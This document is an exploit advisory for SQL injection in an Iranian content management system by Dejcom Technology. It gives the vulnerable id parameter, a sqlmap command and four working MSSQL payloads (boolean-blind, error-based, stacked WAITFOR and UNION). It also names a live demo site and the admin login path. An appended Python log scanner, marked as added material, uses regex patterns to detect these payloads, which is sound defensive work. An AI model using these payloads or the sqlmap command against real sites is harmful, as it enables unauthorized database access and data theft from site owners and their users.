Dejcom Technology IRANIAN CMS SQL injection

2019.11.04
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# Exploit Title: Dejcom Technology IRANIAN CMS SQL injection
# Date: 2019-10-31
# Exploit Author: S I R M A X
# Vendor Homepage: http://dejcom.ir/
# Version: All Version
# Tested on: win,linux
=================================================================================
[SQL injection]
[+] Method ( Sql injection )
Storm Security Team of IRan
[+] parameter : ID == php?ID=
=================================================================================
[+] Sqlmap:
[-] sqlmap -u http://Target.com/content.aspx?id= --dbs
[#] Testing Method:
[+] - boolean-based blind
[+] - error-based
[+] - stacked queries
[+] - UNION query
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|||||||||||||||||||||||
Parameter: id (GET)  ||
|||||||||||||||||||||||
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=29' AND 3020=3020 AND 'MWXM'='MWXM
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: id=29' AND 4451 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (4451=4451) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113))) AND 'Toqj'='Toqj
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=29';WAITFOR DELAY '0:0:5'--
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-1841' UNION ALL SELECT NULL,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(113)+CHAR(113)+CHAR(85)+CHAR(75)+CHAR(80)+CHAR(119)+CHAR(66)+CHAR(98)+CHAR(79)+CHAR(113)+CHAR(105)+CHAR(90)+CHAR(112)+CHAR(80)+CHAR(76)+CHAR(99)+CHAR(71)+CHAR(120)+CHAR(73)+CHAR(89)+CHAR(121)+CHAR(98)+CHAR(89)+CHAR(65)+CHAR(110)+CHAR(67)+CHAR(102)+CHAR(81)+CHAR(78)+CHAR(100)+CHAR(103)+CHAR(79)+CHAR(65)+CHAR(73)+CHAR(68)+CHAR(85)+CHAR(78)+CHAR(81)+CHAR(70)+CHAR(76)+CHAR(71)+CHAR(105)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113),NULL,NULL-- Cdmy
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
=================================================================================
Demo:
[+] http://nozhanco.net/content.aspx?id=[SQL]
=================================================================================
admin panel => Target.com/panel/login.aspx
=================================================================================
[=] T.me/Sir_Max
[=] Telegram Channel ==> @Storm_Security
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
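A defender-side check for the four payload types listed above, as an added example that is not part of the original advisory: it scans web-server access-log lines for requests to content.aspx whose id value is not a plain integer and labels which of the listed techniques the value resembles. The log field order, the shortened sample lines, the IP addresses and the names classify and scan are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed W3C field order for the constructed sample below (not from the advisory).
FIELDS = ["date", "time", "method", "stem", "query", "c_ip", "status"]
# One signature per technique listed in the advisory (MSSQL back end).
RULES = [
    ("boolean-blind", re.compile(r"'\s*AND\s+(\d+)\s*=\s*\1\b", re.I)),
    ("error-based", re.compile(r"\bIN\s*\(\s*SELECT\s*\(\s*CHAR\(\d+\)\s*\+", re.I)),
    ("stacked-queries", re.compile(r";\s*WAITFOR\s+DELAY\b", re.I)),
    ("union-query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
]
ID_PARAM = re.compile(r"(?:^|&)id=([^&]*)", re.I)

def classify(query):
    """Return the rule names that fire on the id parameter of a raw query string."""
    m = ID_PARAM.search(query)
    value = unquote(m.group(1)) if m else ""
    if not m or re.fullmatch(r"[0-9]+", value):
        return []  # no id parameter, or the plain integer the page expects
    hits = [name for name, rx in RULES if rx.search(value)]
    return hits or ["non-numeric-id"]

def scan(lines):
    """Yield (client_ip, path, hits) for each suspicious request to content.aspx."""
    for line in lines:
        if line.startswith("#") or not line.strip():
            continue
        rec = dict(zip(FIELDS, line.split()))
        if not rec.get("stem", "").lower().endswith("/content.aspx"):
            continue
        hits = classify(rec.get("query", ""))
        if hits:
            yield rec.get("c_ip"), rec["stem"], hits

# Constructed sample log: documentation IP ranges, payloads shortened from the advisory.
SAMPLE = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2019-10-31 10:00:01 GET /content.aspx id=29 198.51.100.7 200
2019-10-31 10:00:02 GET /content.aspx id=29%27%20AND%203020%3D3020%20AND%20%27MWXM%27%3D%27MWXM 203.0.113.9 200
2019-10-31 10:00:03 GET /content.aspx id=29%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- 203.0.113.9 200
2019-10-31 10:00:04 GET /content.aspx id=-1841%27%20UNION%20ALL%20SELECT%20NULL%2CCHAR(113)%2BCHAR(120)%2CNULL%2CNULL--%20Cdmy 203.0.113.9 200
2019-10-31 10:00:05 GET /content.aspx id=29%27%20AND%204451%20IN%20(SELECT%20(CHAR(113)%2BCHAR(120))) 203.0.113.9 500
2019-10-31 10:00:06 GET /content.aspx id=abc 198.51.100.7 200
""".splitlines()

if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE):
        print(ip, path, ",".join(hits))
```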

